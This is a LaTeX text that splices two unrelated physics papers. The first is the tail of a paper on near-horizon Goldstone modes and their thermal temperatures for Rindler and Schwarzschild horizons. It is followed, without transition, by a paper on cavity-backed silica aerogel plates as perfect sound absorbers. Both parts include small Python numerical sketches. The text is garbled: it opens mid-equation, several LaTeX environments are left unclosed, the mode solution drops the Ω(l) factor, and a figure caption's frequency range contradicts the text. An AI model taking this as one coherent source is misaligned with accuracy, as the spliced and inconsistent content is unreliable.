&& -8 \sin\theta \partial^2_v F + \frac{3}{(2M)^2} \cos\theta \partial_{\theta} F + \frac{3}{(2M)^2} \sin\theta \partial^2_{\theta} F \nonumber\\ &+& \frac{3}{(2M)^2} \csc\theta \partial^2_{\phi} F -16 \sin\theta \partial^2_v \partial^2_{\theta} F-16 \cos\theta \partial^2_v \partial_{\theta} F\nonumber\\ &-& 16 \csc\theta \partial^2_v \partial^2_{\phi} F = 0~.
\label{eqn}
\end{eqnarray}
In this analysis the full metric has been considered. Since we are interested in the near horizon symmetries, the near horizon metric should be enough to obtain the same result. For completeness, we explicitly demonstrate this in Appendix \ref{App1}.
Since the action has rotational symmetry, we can take the following ansatz for the Goldstone boson mode in terms of spherical harmonics,
\begin{equation}
F(v,\theta,\phi)=\frac{1}{k} \sum_{lm} {c_{lm}}f_{lm}(v) Y_{lm}(\theta,\phi)\label{F1},
\end{equation}
where $c_{lm}$ are constant coefficients and $f_{lm}$ are the time dependent mode functions. This is consistent with the spherically symmetric Schwarzschild geometry. The factor ${1}/{k} = {4M}$ is introduced for dimensional reasons.
Substituting the form of $F$ (\ref{F1}) in (\ref{eqn}), we get the following equation of motion for $f_{lm}(v)$
\begin{eqnarray} \label{modeeq2}
&& [2l(l+1) -1] \partial^2_{v} f_{lm} - \frac{3}{32 M^2} l(l+1) f_{lm} = 0 .
\end{eqnarray}
Since the near horizon geometry of the Schwarzschild black hole is Rindler with a sphere as spatial section, one notices some significant differences between the mode dynamics governed by Eq. (\ref{modeeq2}) and that of the previous case in Eq. (\ref{modeeq1}). Most importantly, for a spherical spatial geometry the effective potential perceived by an individual mode parametrized by $(l,m)$ is no longer universal but depends upon the angular momentum $l$. Before we discuss the implications of this dependence, let us take a look at the behaviour of the individual modes.
\begin{itemize}
\item For $l=0$ mode, the equation reduces to,
\begin{equation}
\partial^2_{v} f_{00}(v) =0~.
\end{equation}
The solution of the above equation is $f_{00} = c_1(x^A) v + c_2(x^A)$. By choosing $c_1=0$, the final solution will be $f_{00}(v) = c_2(x^A)$.
\item For all the remaining modes, $l\geq 1$, we get an inverted harmonic oscillator potential similar to our previous case. One important difference is the angular momentum dependence of the inverted harmonic potential. Therefore, the universality of all the modes with respect to their time dynamics is lost, as opposed to our previous study of the Rindler metric with flat spatial section. However, it can be checked that, numerically, the inverted potential depends very weakly on the value of $l$, which we will discuss in terms of temperature in the next subsection. The mode equation reads
\begin{eqnarray}
\partial^2_{v} f_{lm} -k^2 \Omega^2 f_{lm}(v) = 0~,
\end{eqnarray}
where,
\begin{equation}
\Omega = \sqrt{\frac{3 l (l+1)}{ 2(2 l(l+1)-1)}}~.
\end{equation}
\end{itemize}
The complete solution for all the modes can therefore be written as follows:\\
\begin{itemize}
\item for $l=0$ ;
\begin{eqnarray}
F(x^A) = \sum_{lm} \frac{1}{k} c_2(x^A) Y_{lm}(x^A);
\end{eqnarray}
\item for $l \geq 1$,
\begin{eqnarray}
F(v,x^A) = \sum_{lm} \frac{A}{k} e^{ k v} Y_{lm}(x^A)~.
\label{solSR}
\end{eqnarray}
\end{itemize}
Hereafter we can proceed along the same lines as before. The important difference is the $l$-dependent inverted harmonic potential
\begin{equation}
V_{harmonic} = - \frac12 \Omega(l)^2 {k}^2 f_{lm}^2~.
\end{equation}
Therefore, strictly speaking, in the present case the degenerate states for a fixed $l$ are only those with $m$ within $(-l,l)$. However, let us point out that if we take the numerical values into consideration, the value of $\Omega$ is confined within a very narrow region
\begin{equation}
\sqrt{\frac{3}{4}}\leq\Omega(l)\leq 1~.
\end{equation}
Hence, one can approximately consider all the quantum states of the Goldstone boson parametrized by $(l,m)$ with $l\geq1$ as quasi-degenerate.
Unlike the previous case of the Rindler spacetime with flat spatial section, the emission probability in the present case is identified with a Boltzmann distribution with an $l$-dependent temperature,
\begin{eqnarray}
T_l = \frac{\hbar}{8 \pi M} \Omega(l) ,
\end{eqnarray}
which depends weakly on the value of the angular momentum quantum number $l$. Interestingly, for the $l=1$ mode the above expression comes out exactly the same as the usual black hole temperature $T_{BH}$ given by the Hawking expression \cite{Hawking:1974rv}. Considering the other modes, we can also define an average temperature
\begin{equation}
T_{avg} = \frac{\hbar}{8 \pi M} \left(\frac{\sum_l \Omega(l)}{\sum_l 1}\right) = \frac{\hbar }{8 \pi M} \left(\sqrt{\frac34}\right) = \frac{\sqrt{3}}{2} T_{BH}~,
\end{equation}
Here again we observe that the Goldstone modes are inherently thermal in nature. The obtained temperature is proportional to the Hawking temperature of the Schwarzschild horizon.
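These statements are easy to verify numerically; the short sketch below checks that $\Omega(1)=1$ (so that $T_1=T_{BH}$), that all $\Omega(l)$ lie in the quoted narrow band, and that their average tends to $\sqrt{3}/2$:

```python
import math

def Omega(l):
    # Omega(l) = sqrt( 3 l(l+1) / (2 (2 l(l+1) - 1)) )
    x = l * (l + 1)
    return math.sqrt(3 * x / (2 * (2 * x - 1)))

# l = 1 reproduces the Hawking value: T_1 = hbar/(8 pi M) = T_BH
assert abs(Omega(1) - 1.0) < 1e-12

# all modes lie in the narrow band sqrt(3/4) <= Omega(l) <= 1,
# decreasing monotonically towards the lower edge as l grows
vals = [Omega(l) for l in range(1, 10001)]
assert all(math.sqrt(0.75) <= w <= 1.0 for w in vals)
assert all(a >= b for a, b in zip(vals, vals[1:]))

# the average of Omega(l) tends to sqrt(3)/2, so T_avg -> (sqrt(3)/2) T_BH
avg = sum(vals) / len(vals)
assert abs(avg - math.sqrt(3) / 2) < 1e-3
```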
From the analysis so far, what we can infer is that, since the origin of the Goldstone modes is associated with the breaking of symmetries of the horizon, those modes can be potential candidates for the microscopic states of a black hole. Quantum mechanically, all those states turn out to be thermal with a specific temperature. However, the origin of the different expressions for the temperature, compared with the usual Hawking temperature, needs to be explored in detail. Furthermore, the nature of the degeneracy of those Goldstone states appears to depend upon the spacetime background. For the Rindler spacetime with plane symmetric horizon, all the modes emerge as degenerate and, therefore, each mode feels the same temperature. On the other hand, for the Schwarzschild black hole this is not the case, as the degeneracy of states is lifted by the less symmetric spherical horizon. Nevertheless, we hope that this thermal nature of the Goldstone modes at the quantum level can be inferred for all types of horizon. We keep this for a future project.
\section{Summary and conclusions}
The microscopic origin of the thermodynamic nature of a black hole is one of the fundamental questions in the theory of gravity. It is obvious that within the framework of Einsteinian gravity this question cannot be answered. However, the recent understanding of the infrared behavior of gravity opens up a new avenue towards addressing this question. In a gravitational theory, one of the interesting infrared properties is the emergence of an infinite dimensional symmetry at null infinity, which leads to the soft graviton theorem. Over the years it has been observed that an analogous symmetry exists near a null horizon, which can play an important role in explaining the microscopic origin of horizon thermodynamics. Here we particularly concentrated on the BMS-like symmetry in the near horizon region. Under the diffeomorphism symmetry, appropriate boundary conditions are imposed in such a way that the near horizon form of the metric remains unchanged. It is observed that in this process the macroscopic parameters, like the mass (or surface gravity), get modified. This change in macroscopic parameters is argued to be a phenomenon of symmetry breaking on the horizon, and the corresponding parameter can be viewed as the Goldstone mode.
In the present paper our main effort was to explore the dynamics of these Goldstone modes. For the purpose of our present study, we considered two simple gravitational backgrounds: a simple Rindler spacetime with a flat Killing horizon, and the Schwarzschild black hole.
Our preliminary investigation at tree level reveals that the horizon is indeed a special place, where the dynamics of the Goldstone mode in momentum space is governed by an inverted harmonic potential. As mentioned earlier, in the framework of classical Einsteinian gravity it is difficult to understand this situation, as those modes are simply unstable. Interestingly, at the quantum level this instability \cite{Morita:2019bfr} can have a nice interpretation in terms of an inherent thermality connected with its chaotic behaviour, which may provide us a first glimpse of a microscopic view of horizon thermodynamics. Interestingly, for both gravitational backgrounds the temperature turned out, as expected, to be proportional to the surface gravity, which is similar to the expressions (up to a numerical factor) given by Unruh \cite{Unruh:1976db} and Hawking \cite{Hawking:1974rv}. This leads us to think that these Goldstone modes might be candidates for the microscopic description of horizon thermality.
Even more interestingly, we found a large number of degenerate states for Rindler and quasi-degenerate states for Schwarzschild black holes, which may be responsible for the horizon entropy. We will take up these issues in more detail in a future publication.
So far we have considered black hole spacetimes which are static and hence generate only one Goldstone field. However, for a gravitational background with intrinsic rotation, such as the Kerr spacetime, there will be more than one symmetry generator, and the corresponding analysis of the Goldstone mode dynamics will be richer. This topic is currently under investigation. Finally, we want to mention that since the Goldstone modes are thermal in nature, it might be interesting to look at the BMS symmetry in this way, hoping that such an analysis will be able to shed some light on the microscopic description of horizon thermodynamics.
\section{Introduction}
Silica aerogels are extremely lightweight nanoporous materials\cite{Kistler1931}. The frame of these materials consists of an assembly of connected, small cross-section, beam-like elements resulting from fused nanoparticles. This particular assembly gives silica aerogel a very low elastic stiffness when compared to a rigid silica structure of identical porosity. Aerogels possess a wide variety of exceptional properties, such as low thermal conductivity, low dielectric constant, low index of refraction, and a very large porosity (80-99.8$\%$), the latter providing these materials an extremely low density\cite{Gesser_89}. Because of this large porosity, and therefore the very large available contact area, they have been used as filters, absorbent media or waste containment (see Refs. [\onlinecite{Cooper_89,Gesser_89,Komarneni_93}] and references therein). They have also been applied as catalysts or even to capture cosmic dust \cite{Hrubesh_98, Tsou_95}. Similarly, their low thermal conductivity, which so far seems to be their most interesting property compared to any other elastic or poroelastic material, has been exploited in various commercial applications including thermal insulation \cite{Herrmann_95} and heat and cold storage devices \cite{Hrubesh_98,Fricke_95}.
\par
In acoustics, aerogels are used as impedance matching materials to develop efficient ultrasonic devices \cite{Gronauer_86,Gerlach_92} or as sound absorbing materials for anechoic chambers\cite{Hrubesh_98,Gibiat_95}. Beyond these properties, silica aerogel plates are excellent candidates to design new types of membrane metamaterials, since they exhibit subwavelength resonances and efficient absorption\cite{Guild_2016,Geslaina_2018}. Indeed, the use of membrane metamaterials to control acoustic waves has attracted increasing interest in recent years\cite{huang2016membrane}. Membrane and plate metamaterials have been employed in the past to design efficient absorbers\cite{mei2012dark,Ma_2014,yang2015subwavelength}, e.g., using a single membrane backed by a cavity \cite{Ma_2014,Romero_2016}, which can present deeper subwavelength resonances as compared with absorbing metamaterials based on air cavities\cite{li2016acoustic,jimenez2016,yang2017optimal,peng2018composite}. Moreover, double negative acoustic metamaterials\cite{yang2013coupled} can be achieved by combining a lattice of membranes, which provides a negative effective mass density \cite{Yang_2008}, with subwavelength side-branch resonators, which provide a negative effective bulk modulus\cite{Lee_2010}. In addition, periodic arrangements of clamped plates have been efficiently used to control harmonic generation\cite{Zhang_2016} or solitary waves in the nonlinear acoustic regime\cite{Zhang_2017}.
\par
In this work, we make use of the efficient and unusual attenuating properties of silica aerogel plates to design subwavelength perfect sound absorbers. The analyzed system is depicted in Fig.~\ref{fig1}(a) and consists of a periodic repetition of the resonant building units illustrated in Fig.~\ref{fig1}(b). These units are made of a slit loaded by a clamped aerogel plate backed by a closed cavity. The perfect absorption of this system is comprehensively analyzed both theoretically and experimentally. In a first stage, we model the system using the Transfer Matrix Method (TMM), accounting for the contribution of the losses to the problem, i.e., the viscothermal losses from the slit and cavity and the viscoelastic losses from the aerogel plate. In a second stage, we analyze the impedance matching condition, also known as the critical coupling condition, which is obtained once the inherent losses exactly compensate the leakage of the system\cite{Romero_2016a}. The Argand diagram of the reflection coefficient \cite{brekhovskikh2012acoustics} is further employed to evaluate either the lack or the excess of inherent losses in the system, thus providing important information on the impedance matching condition. The Argand diagram is revealed as a universal and powerful tool to design perfect absorbers.
\par
We consider a slotted panel of thickness $L$, whose slits, of height $h_s$, are loaded by a circular clamped aerogel plate of radius $r_m$ and thickness $h_m$ backed by a cylindrical air cavity of the same radius and depth $l_c$. The clamped aerogel plate plays the central role, as it represents the main source of intrinsic losses and mainly governs the resonance of the system. Although the theoretical calculations are only carried out for the building block of size $L\times a\times a$ shown in Fig.~\ref{fig1}(b), the generalization to the case of $N$ resonator unit cell is straightforward.
\begin{figure}[t]
\centering
\includegraphics[width=\columnwidth]{Fig01.pdf}
\caption{(color online) (a) Scheme of the panel under consideration constructed by a slit, the aerogel plate, and the cavity.
(b) Schematic description of the unit cell.}\vspace*{-5mm}
\label{fig1}
\end{figure}
For wavelengths $\lambda$ large enough compared to the thickness of the aerogel plate $h_m$, and neglecting the effects of rotary inertia and additional deflections caused by shear forces, the transverse plate displacement $w_m$ satisfies the Kirchhoff-Love wave equation \cite{Graff91}.
The plate is described by its density $\rho$ and its bending stiffness $D={Eh_m^3}/{12(1-\nu^2)}$, where $E$ is the Young modulus and $\nu$ the Poisson ratio of the plate.
Assuming an implicit time dependence $e^{i\omega t}$, with $\omega$ the angular frequency, the viscoelastic behavior of silica aerogel can be modeled via a complex Young modulus, $E=E_0(1+i\eta\omega)$, where $E_0$ and $\eta$ are the unrelaxed Young modulus and the loss factor respectively.
In the subwavelength regime, the silica aerogel disk can be treated as a point-like resonant element located at $(x,y)=(L/2,a/2)$ (note that $h_m\ll\lambda_0$, where $\lambda_0$ is the wavelength in air).
The acoustic impedance of the clamped circular cross-sectional plate thus takes the form \cite{Skvor91,Bongard10},
\begin{equation} \label{eq.Zp}
Z_p = \frac{-i\omega\rho h_m}{\pi r_m^2}\frac{ I_1(k r_m) J_0(k r_m) + J_1(k r_m)I_0(k r_m)}{I_1(k r_m)J_2(k r_m)-J_1(k r_m)I_2(k r_m)},
\end{equation}
where $J_n$ and $I_n$ are the $n$-th order regular and modified Bessel functions of the first kind, respectively, and the wavenumber in the plate satisfies $k^2=\omega\sqrt{\rho h_m/D}$.
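As a numerical illustration (not part of the original analysis), Eq.~(\ref{eq.Zp}) can be evaluated directly with standard Bessel routines; the geometry and material values below are those quoted later in the text, and the viscoelastic case simply uses the complex modulus $E=E_0(1+i\eta\omega)$. A minimal Python sketch:

```python
import numpy as np
from scipy.special import iv, jv

# Aerogel plate data quoted later in the text
rho_p, nu = 80.0, 0.12            # density [kg/m^3], Poisson's ratio
r_m, h_m = 19.5e-3, 10.5e-3       # plate radius and thickness [m]
E0, eta = 197.92e3, 4.47e-6       # unrelaxed Young modulus [Pa], loss factor

def Z_plate(omega, lossy=True):
    """Impedance of the clamped circular plate, Eq. (Zp)."""
    E = E0 * (1 + 1j * eta * omega) if lossy else E0
    D = E * h_m**3 / (12 * (1 - nu**2))          # bending stiffness
    k = (omega**2 * rho_p * h_m / D) ** 0.25     # k^2 = omega*sqrt(rho h_m/D)
    x = k * r_m
    num = iv(1, x) * jv(0, x) + jv(1, x) * iv(0, x)
    den = iv(1, x) * jv(2, x) - jv(1, x) * iv(2, x)
    return -1j * omega * rho_p * h_m / (np.pi * r_m**2) * num / den
```

Without viscoelastic losses the impedance is purely reactive (imaginary); the complex Young modulus adds the positive resistive part that the critical-coupling design relies on.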
\par
Viscothermal losses also occur in the narrow slits\cite{wardPRL2015} and in the cavity, offering a useful degree of freedom to tune the losses of the system.
Assuming that only plane waves propagate in these channels, the viscothermal losses are modeled by effective parameters: complex and frequency-dependent wavenumbers $k_s=\omega\sqrt{\rho_s/\kappa_s}$ and $k_c=\omega\sqrt{\rho_c/\kappa_c}$, and impedances $Z_s=\sqrt{\kappa_s\rho_s}/h_s a$ and $Z_c=\sqrt{\kappa_c\rho_c}/\pi r_m^2$ in the slit and in the cavity respectively. Note that we make use of the effective density $\rho_s$ and bulk modulus $\kappa_s$ of a slit \cite{stinson1991} for the slotted channel, while we make use of the effective density $\rho_c$ and bulk modulus $\kappa_c$ of a cylindrical duct\cite{stinson1991} for the cavity.
\begin{figure*}[t]
\centering
\includegraphics[width=1\textwidth]{Fig02.pdf}
\caption{(color online) Reflection coefficient, in logarithmic scale, as a function of the frequency and (a) slit length, $L$, and (b) cavity depth, $l_c$. The rest of parameters are fixed to the optimal geometry (see main text).
(c) Representation of the reflection coefficient in the complex frequency plane for the sample with optimized parameters.
The lines show the trajectory of the zero when the corresponding geometrical parameter is modified.
(d) and (e) show the absorption coefficient and the phase of the reflection coefficient respectively for three values of the slit thickness, $h^\prime_s$, $h_s$ (black line) being the optimum value.
(f) Argand diagram of the complex reflection coefficient from 0 to 1200 Hz, for the lossless structure (dashed circle), the case of perfect absorption (PA) geometry (black circle), the case $h_s'=h_s/2$, (red circle) and the case $h_s'=2h_s$ (blue circle). The small arrows indicate the trajectory from low to high frequencies.
}\vspace*{-6mm}
\label{fig2}
\end{figure*}
The scattering properties of the system are studied through the reflection coefficient $R$ obtained by TMM.
We relate the sound pressure and normal particle velocity at the surface of the system, $[P_0,V_0] = [P(x), V_x(x)]_{x=0}$ to the ones at the end of the system, $[P_L,V_L] = [P(x), V_x(x)]_{x=L}$, by a transfer matrix as
\begin{equation}\label{eq.TMM}
\left[\begin{array}{c}
P_0 \\
V_0 \\
\end{array}\right] = {\bf T} \left[\begin{array}{c}
P_L \\
V_L \\
\end{array}\right],\,
\text{where}\quad
{\bf T}={\bf M}_{\Delta l}{\bf M}_S{\bf M}_{R}{\bf M}_S.
\end{equation}
In Eq.~(\ref{eq.TMM}), transfer matrix over half the slit length ${\bf M}_S$ reads as
\begin{equation
{\bf M}_S=\left[\begin{array}{cc}
\cos\left(k_s{L}/{2}\right) & i Z_s\sin\left(k_s{L}/{2}\right) \\
{i}\sin\left(k_s{L}/{2}\right)/{Z_s} & \cos\left(k_s{L}/{2}\right) \\
\end{array}
\right],
\end{equation}
and ${\bf M}_{R}$ accounts for the local effect of the aerogel plate together with the back cavity as
\begin{equation
{\bf M}_{R}=\left[\begin{array}{cc}
1 & 0 \\
{1}/{Z_{R}} & 1 \\
\end{array}
\right],
\end{equation}
where $Z_{R}=Z_p - i Z_c\cot(k_c l_c)$. The matrix ${\bf M}_{\Delta l}$ provides the radiation correction of the slit to the free space as
\begin{equation
{\bf M}_{\Delta l}=\left[\begin{array}{cc}
1 & Z_{\Delta l} \\
0 & 1
\end{array}
\right],
\end{equation}
where $Z_{\Delta l}=-i\omega\Delta l\rho_0/\phi_sa^2$, with $\phi_s=h_s/a$ the surface porosity of the metasurface, $\rho_0$ the air density and $\Delta l$ the end correction length that can be approximated as\cite{kergomard1987}
\begin{equation}
\Delta l=h_s\phi_s\sum_{n=1}^{\infty}\frac{\sin^2(n\pi\phi_s)}{\left(n\pi\phi_s\right)^3}.
\end{equation}
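Since the terms of this series decay like $1/n^3$ once $n\pi\phi_s>1$, the end correction converges quickly and can be evaluated by simple truncation. An illustrative Python sketch, using the optimized slit dimensions quoted later in the text:

```python
import numpy as np

h_s, a = 1.285e-3, 42e-3      # optimized slit height and cell width [m]
phi_s = h_s / a               # surface porosity of the metasurface

def delta_l(n_terms=20000):
    """Truncated end-correction series for the slit radiation."""
    n = np.arange(1, n_terms + 1)
    x = n * np.pi * phi_s
    return h_s * phi_s * np.sum(np.sin(x)**2 / x**3)
```

A few thousand terms are ample for this porosity; doubling the truncation changes the result only at the sixth significant digit.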
The surface impedance at $x=0$ can thus be directly obtained using Eq. (\ref{eq.TMM}) and considering the rigid backing condition ($V_L = 0$) as
\begin{widetext}
\begin{equation}\label{eq.ZT}
Z_T = \frac{P_{0}}{V_{0}}= \dfrac{Z_s (Z_{\Delta l}+Z_{R})+i \tan \left({k_s L}/{2}\right) \left[i Z_s Z_{R} \tan \left({k_s L}/{2}\right)+2 Z_{\Delta l} Z_{R}+Z_s^2\right]}{Z_s+ 2 iZ_{R} \tan \left({k_s L}/{2}\right)}.
\end{equation}
\end{widetext}
Finally, we calculate the reflection and absorption coefficient using Eq.~(\ref{eq.ZT}) as
\begin{equation}\label{eq.Ref
R=\frac{Z_T-Z_0}{Z_T+Z_0},\quad\text{and}\quad \alpha=1-|R|^2,
\end{equation}
where $Z_0$ is the impedance of the surrounding medium, i.e., the air\footnote{For the air medium at room temperature and ambient pressure $P_0 = 101325$ Pa, we used an adiabatic coefficient $\gamma = 1.4$, a density $\rho_0 = 1.213$ kg/m$^3$, a bulk modulus $\kappa_0 = \gamma P_0$, a Prandtl number $\mathrm{Pr} = 0.71$, a viscosity $\eta_0 = 1.839\times 10^{-5}$ Pa$\cdot$s, a sound speed $c_0 = \sqrt{\gamma P_0/\rho_0}$ m/s, and an acoustic impedance $Z_0 = \rho_0 c_0 / a^2$.}. For the aerogel plate, we used an unrelaxed Young modulus $E_0=197.92$ kPa, a loss factor $\eta=4.47\times10^{-6}$ Pa$\cdot$s, a density $\rho = 80$ kg/m$^3$, and a Poisson's ratio $\nu = 0.12$, as characterized in Ref. [\onlinecite{Geslaina_2018}]. Aerogel plates of $r_m=19.5$ mm and $h_m=10.5$ mm were selected, and $a=42$ mm was fixed by the width of the square cross-sectional impedance tube used for the experimental validation.
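To make the chain of matrices in Eq.~(\ref{eq.TMM}) concrete, the sketch below assembles $\mathbf{T}$ numerically and checks it against the closed-form surface impedance of Eq.~(\ref{eq.ZT}). As a simplifying assumption (for illustration only), the air in the slit and cavity is taken lossless — plain plane-wave parameters instead of the Stinson effective ones — and the plate loss factor is set to zero; in that case $Z_T$ is purely reactive and $|R|=1$ at every frequency, i.e., the lossless circle of the Argand diagram discussed below.

```python
import numpy as np
from scipy.special import iv, jv

# Optimal geometry and air constants quoted in the text
a, L, h_s, l_c = 42e-3, 44e-3, 1.285e-3, 29.8e-3
r_m, h_m = 19.5e-3, 10.5e-3
rho0, gamma, P0 = 1.213, 1.4, 101325.0
c0 = np.sqrt(gamma * P0 / rho0)
Z0 = rho0 * c0 / a**2
rho_p, nu, E0 = 80.0, 0.12, 197.92e3

def elements(omega):
    """Lossless building blocks: slit, cavity, plate, end correction."""
    ks, Zs = omega / c0, rho0 * c0 / (h_s * a)            # lossless slit
    kc, Zc = omega / c0, rho0 * c0 / (np.pi * r_m**2)     # lossless cavity
    D = E0 * h_m**3 / (12 * (1 - nu**2))                  # lossless plate, Eq. (1)
    x = (omega**2 * rho_p * h_m / D) ** 0.25 * r_m
    Zp = (-1j * omega * rho_p * h_m / (np.pi * r_m**2)
          * (iv(1, x) * jv(0, x) + jv(1, x) * iv(0, x))
          / (iv(1, x) * jv(2, x) - jv(1, x) * iv(2, x)))
    ZR = Zp - 1j * Zc / np.tan(kc * l_c)                  # plate + back cavity
    phi_s = h_s / a
    n = np.arange(1, 5000)
    dl = h_s * phi_s * np.sum(np.sin(n*np.pi*phi_s)**2 / (n*np.pi*phi_s)**3)
    Zdl = -1j * omega * dl * rho0 / (phi_s * a**2)        # radiation correction
    return ks, Zs, ZR, Zdl

def Z_T_matrix(omega):
    """Surface impedance from the matrix product T = Mdl MS MR MS."""
    ks, Zs, ZR, Zdl = elements(omega)
    MS = np.array([[np.cos(ks*L/2), 1j*Zs*np.sin(ks*L/2)],
                   [1j*np.sin(ks*L/2)/Zs, np.cos(ks*L/2)]])
    MR = np.array([[1, 0], [1/ZR, 1]], complex)
    Mdl = np.array([[1, Zdl], [0, 1]], complex)
    T = Mdl @ MS @ MR @ MS
    return T[0, 0] / T[1, 0]          # rigid backing: V_L = 0

def Z_T_closed(omega):
    """Closed-form surface impedance, Eq. (ZT)."""
    ks, Zs, ZR, Zdl = elements(omega)
    t = np.tan(ks*L/2)
    return ((Zs*(Zdl + ZR) + 1j*t*(1j*Zs*ZR*t + 2*Zdl*ZR + Zs**2))
            / (Zs + 2j*ZR*t))

def reflection(omega):
    ZT = Z_T_matrix(omega)
    return (ZT - Z0) / (ZT + Z0)
```

Restoring the viscothermal effective parameters and the complex Young modulus turns part of the incident energy into absorption and pulls the Argand trajectory inside the unit circle.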
\par
The procedure begins by looking for the geometric parameters giving the most efficient absorption at the lowest resonance frequency. The geometric parameters of the system are thus optimized numerically using a sequential quadratic programming (SQP) method \cite{powell1978}.
The following parameters were obtained: $L=44$ mm, $h_s=1.285$ mm, and $l_c=29.8$ mm. The highly efficient absorption peak appears at 591.2 Hz and is associated with a reflection coefficient amplitude of $10\log_{10}|R| = -62$ dB. The corresponding perfectly absorbed wavelength is $\lambda/L=13.1$ times larger than the depth of the structure. This subwavelength feature is due to the slow sound properties induced by the presence of the slit loading resonators\cite{Groby2015,Groby2016,jimenez2016}. Effectively, the resonance frequency of the slit in the absence of these loading resonators is around 1900 Hz.\footnote{Note that the slow sound properties can be improved by using thinner aerogel plates, thereby allowing a strongly reduced ratio, e.g., $\lambda/L=30$ at $f=259$ Hz using $h_m = 1.32$ mm and $h_s= 0.95$ mm. Nevertheless, we are constrained by the available aerogel plates ($h_m=10.5$ mm) for the experimental validation.}
\begin{figure*}[t]
\centering\vspace*{-2mm}
\includegraphics[width=1\textwidth]{Fig03.pdf}
\caption{(color online) (a) Photograph of the experimental configuration.
(b) Absorption as a function of the frequency.
(c) Complex plane representation of the reflection coefficient. The small arrows indicate the trajectory from low to high frequencies.}\vspace*{-6mm}
\label{fig3}
\end{figure*}
Figures~\ref{fig2}(a) and \ref{fig2}(b) show a parametric study of the system reflection coefficient around the optimal configuration.
The reflection coefficient drops significantly when the geometry approaches the optimal parameters (marked by white crosses).
However, the balance between the inherent losses and the leakage of the system is difficult to identify by using this parametric analysis.
A first approach to check that these parameters lead to perfect absorption of the sound energy consists of representing the reflection coefficient in the complex frequency plane, as shown in Fig.~\ref{fig2}(c).
Using this representation, the locations of the zero/pole pairs of the reflection coefficient can be studied.
In the lossless case, the zeros are complex conjugates of their corresponding poles, both appearing in the opposite half spaces of complex frequency plane (zeros in the lower half space and poles in the upper one with our time Fourier convention).
However, the zeros follow a trajectory towards the pole half-space when losses are introduced in the system. Note that the losses are modified when the system geometry is modified. The trajectory of the lowest-frequency zero is depicted in Fig.~\ref{fig2}(c) as $h_s$, $l_c$ and $L$ are varied. For a given set of geometric parameters, the trajectory of the zero crosses the real frequency axis, ensuring the exact balance of the leakage by the inherent losses and therefore providing perfect absorption\cite{Romero_2016a}.
\par
The complex frequency plane also gives useful insights to design and tune open lossy resonant systems\cite{Romero_2016,jimenez2016,Jimenez2017}. Such a system is characterized by its leakage and its inherent losses; the impedance matching condition corresponds to the critical coupling of the system, i.e., the perfect balance of the leakage by the inherent losses. The intrinsic losses of the system are too large (too small) compared to the leakage when the zero has (has not) already crossed the real axis; the absorption is then not optimal, as the impedance matching condition is not satisfied.
These situations are illustrated in Fig.~\ref{fig2}(d), where the absorption coefficient is depicted for different values of $h_s$.
The red curve corresponds to a narrow slit (height $h_s'=h_s/2$) providing an excess of losses, while the blue curve corresponds to a wide slit (height $h_s'=2 h_s$) providing a lack of losses.
The location of the corresponding zero in the complex frequency plane is marked with red and blue crosses in Fig.~\ref{fig2}(c). The perfect balance between the leakage and the losses is the situation depicted in the color map of Fig.~\ref{fig2}(c); the zero of the reflection coefficient is exactly located on the real frequency axis.
Therefore, the complex frequency plane makes it possible to immediately identify whether a particular configuration presents a lack or an excess of losses.
This approach has been recently used to design absorbing materials ranging from porous media\cite{JimenezActa2018,jimenez2016broadband} to different kinds of metamaterials\cite{JImenezAppSci2017,Jimenez2017,Jimenez2017b,Groby2016,Romero_2016}. However, not all systems can be assessed in the complex frequency plane. Indeed, numerical methods do not usually allow solutions to be computed at complex frequencies and, more importantly, experimental results are only available at real frequencies.
A useful approach to overcome this problem consists in analyzing the reflection coefficient $R=|R|e^{i\varphi}$, with $\varphi = \arctan [\textrm{Im}(R)/\textrm{Re}(R)]$, in the complex plane.
Figures~\ref{fig2}(e) and \ref{fig2}(f) depict the phase of the reflection coefficient and the corresponding Argand diagram from 400 to 800 Hz, respectively. The reflection coefficient is necessarily inscribed within the unit circle, i.e., $|R|\leq1$. In the lossless case, the reflection coefficient follows the unit circle counter-clockwise with increasing frequency, starting from $\varphi=0$ at 0 Hz, as $R=e^{i\varphi}$. When losses are accounted for, the trajectory of $R$ is modified and follows an elliptical path around the resonance, contained inside the unit circle and displaced along the real axis of the diagram. On the one hand, the reflection coefficient describes a loop that does not encompass the origin if the losses exceed the optimal ones, e.g., the red ellipse in Fig.~\ref{fig2}(f) calculated for $h_s'=h_s/2$. On the other hand, the ellipse encompasses the origin if losses are lacking, e.g., the blue ellipse in Fig.~\ref{fig2}(f) calculated for $h_s'=2h_s$.
Finally, the ellipse passes through the origin, i.e., $R=0$, when perfect absorption is reached, e.g., the black ellipse in Fig.~\ref{fig2}(f) calculated for $h_s'=h_s$.
In this situation, the impedance matching condition is satisfied.
\par
The designed optimal structure was validated experimentally in a square cross-sectional impedance tube.
The circular aerogel plate was cut by laser cutting and then inserted in a 3D-printed support manufactured by stereolithography (Form 2, Formlabs, UK).
In addition, full wave numerical simulations by finite element method (FEM) were performed.
For the FEM simulations, the plate was modeled as an elastic bulk plate of thickness $h_m$ considering a Kelvin-Voigt viscoelastic model and viscothermal losses were accounted for in the ducts using effective parameters as previously introduced for TMM calculations.
Figure \ref{fig3}(a) shows the 3D printed system together with the aerogel plate before assembling.
The measured absorption is shown in Fig.~\ref{fig3}(b). A good agreement is observed between the measurements, FEM simulations and TMM predictions.
The ripples observed in the experimental data are probably due to non-symmetrical errors during the manufacturing of the circular plate, as well as to the fact that the plate is not perfectly clamped.
Finally, Fig.~\ref{fig3}(c) presents the Argand diagram of the reflection coefficient measured and calculated with the TMM. Both curves pass through the origin at the specific frequency at which the system is impedance matched.
In summary, we have designed and manufactured a resonant building block, made of a cavity-backed clamped aerogel plate, that is suitable and efficient for perfect sound-absorbing panels.
The experimental data agree with those predicted by both the one-dimensional TMM model and the FEM simulations.
We have presented a universal methodology based on the complex representation of the reflection coefficient, i.e., its Argand diagram, to identify the lack or the excess of losses in the system.
This tool can be used further to design complex metasurfaces for perfect sound absorption when the system cannot be evaluated at complex frequencies, thus helping in the rapid design of novel and efficient absorbing metamaterials.
\begin{acknowledgments}
This work has been funded by the RFI \textit{Le Mans Acoustique}, R\'egion Pays de la Loire. N.J. acknowledges financial support from Generalitat Valenciana through grant APOSTD/2017/042.
J.-P.G and V.R.G. gratefully acknowledge the ANR-RGC METARoom (ANR-18-CE08-0021) project and the HYPERMETA project funded under the program \'Etoiles Montantes of the R\'egion Pays de la Loire.
J.S-D. acknowledges the support of the Ministerio de Econom\'{\i}a y Competitividad of the Spanish government, and the European Union FEDER through project TEC2014-53088-C3-1-R.
